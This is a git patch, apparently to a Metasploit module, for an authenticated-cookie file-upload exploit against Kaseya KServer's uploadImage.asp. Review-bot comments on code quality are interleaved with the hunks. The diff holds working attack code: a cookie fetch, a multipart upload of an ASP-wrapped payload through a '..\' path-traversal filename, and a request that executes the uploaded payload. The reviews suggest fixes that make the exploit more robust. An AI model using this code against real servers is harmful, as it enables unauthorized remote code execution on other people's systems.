From 60a245b0c37d529bc3f1cf7b96d21fff08ddbb1d Mon Sep 17 00:00:00 2001
From: Thomas Hibbert
Date: Mon, 18 Nov 2013 14:49:03 +1300
Subject: [PATCH] Fix the arch declaration in uploaded module.
---
 .../http/kaseya_uploadimage_file_upload.rb | 62 ++++++++++++-------
 1 file changed, 41 insertions(+), 21 deletions(-)
 mode change 100644 => 100755 modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
old mode 100644
new mode 100755
index 825c24827e..11fd17e77b
--- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
+++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb
@@ -24,7 +24,7 @@ Code executed in this manner runs under the IUSR account.
 },
 'Author' =>
 [
- 'Thomas Hibbert' # thomas.hibbert@security-assessment.com
+ 'Thomas Hibbert' # cartel
 ],
 'License' => MSF_LICENSE,
 'References' =>
@@ -35,7 +35,7 @@ Code executed in this manner runs under the IUSR account.
 'BadChars' => "\x00",
 },
 'Platform' => 'win',
- 'Arch' => ARCH_x86,
+ 'Arch' => ARCH_X86,
 'Targets' =>
 [
 [ 'Kaseya KServer / Windows', {} ],
@@ -62,6 +62,21 @@ Code executed in this manner runs under the IUSR account.
 return Exploit::CheckCode::Appears
 end
+ def get_cookie
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri("SystemTab", "uploadImage.asp")
+ })
+
+ if res and res.headers['Set-Cookie']
+ cookie = res.headers['Set-Cookie'].scan(/(\w+\=\w+); path\=.+$/).flatten[0]
+ else
+ fail_with(Failure::Unknown, "#{@peer} - No cookie found, will not continue")
+ end
+
+ cookie
+ end
+
 def exploit
 peer = "#{rhost}:#{rport}"
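Review bot: The commit's subject covers only the one-line `ARCH_x86` → `ARCH_X86` fix in this hunk, yet the same patch adds `get_cookie`, rewrites the upload logic in `exploit`, and flips the module's file mode to 100755; a Ruby module loaded by the framework needs no executable bit, and the mode change looks accidental (`git update-index --chmod=-x` reverts it). Splitting the constant fix from the behavioural change would make each reviewable on its own. The preceding hunk also swaps the author's contact e-mail for `# cartel`, which drops the only contact information in the module header.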
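Review bot: `@peer` in the `fail_with` message of `get_cookie` is not assigned anywhere visible — `exploit` builds a local `peer`, not an instance variable — so the failure message would start with an empty host; use `fail_with(Failure::Unknown, "#{rhost}:#{rport} - No cookie found, will not continue")`. `if res and res.headers['Set-Cookie']` should be `if res && res.headers['Set-Cookie']`, since `and` binds looser than assignment and is a precedence trap. The `$` in the `scan` pattern is a line anchor in Ruby; if the intent is the end of the header value, `\z` says so. A one-line header such as `# Requests uploadImage.asp and returns the first name=value pair from Set-Cookie; fails the module when none is returned` would document the new method's contract.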
@@ -69,25 +84,30 @@ Code executed in this manner runs under the IUSR account.
 exe = generate_payload_exe
 asp = Msf::Util::EXE.to_exe_asp(exe)
- data = Rex::MIME::Message.new
- data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"#{payload_name}\"")
+ post_data = Rex::MIME::Message.new
+ post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"..\\#{@payload_name}\"")
- res = send_request_raw({
- 'method' => 'POST',
- 'uri' => normalize_uri('SystemTab','uploadImage.asp?filename=..\..\..\#{payload_name}'),
- 'data' => data,
- 'headers' => {
- 'ctype' => 'multipart/form-data; boundary=#{data.bound}'
- }
- })
- if not res or res.code != 200
- fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
- end
- print_status("#{peer} - Executing payload #{@payload_name}")
- res = send_request_raw({
- 'uri' => normalize_uri(@payload_name),
- 'method' => 'GET'
- })
+ data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
+
+ cookie = get_cookie
+ res = send_request_raw({
+ 'method' => 'POST',
+ 'uri' => normalize_uri('SystemTab','uploadImage.asp?filename=..\..\..\..\\'+@payload_name),
+ 'data' => data,
+ 'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+ 'cookie' => cookie
+ })
+
+ if not res or res.code != 200
+ fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+ end
+
+ print_status("#{peer} - Executing payload #{@payload_name}")
+ res = send_request_cgi({
+ 'uri' => normalize_uri(@payload_name),
+ 'method' => 'GET'
+ })
 end
-end
+ end
+
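Review bot: `data = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')` needs a why-comment, since a reader cannot tell why the leading CRLF before the first part boundary is stripped; something like `# drop the CRLF Rex::MIME emits before the first boundary — the upload handler appears to reject it otherwise (confirm)` keeps the assumption explicit. `if not res or res.code != 200` is better written `unless res && res.code == 200`, avoiding the `or` precedence trap. The result of the final `res = send_request_cgi(...)` is never read, so the assignment can be dropped. The class's closing `end` moves from column 0 to an indented `+ end` with a trailing blank line, which looks unintentional and should stay at column 0. `def exploit` starts outside this hunk, so `@payload_name` is presumably set there.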